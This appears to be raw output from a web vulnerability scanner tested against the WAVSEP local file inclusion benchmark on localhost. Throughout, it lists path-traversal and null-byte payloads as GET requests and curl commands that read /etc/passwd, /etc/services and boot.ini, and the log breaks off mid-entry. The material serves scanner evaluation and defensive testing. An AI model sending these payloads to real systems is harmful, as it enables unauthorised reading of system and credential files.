GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
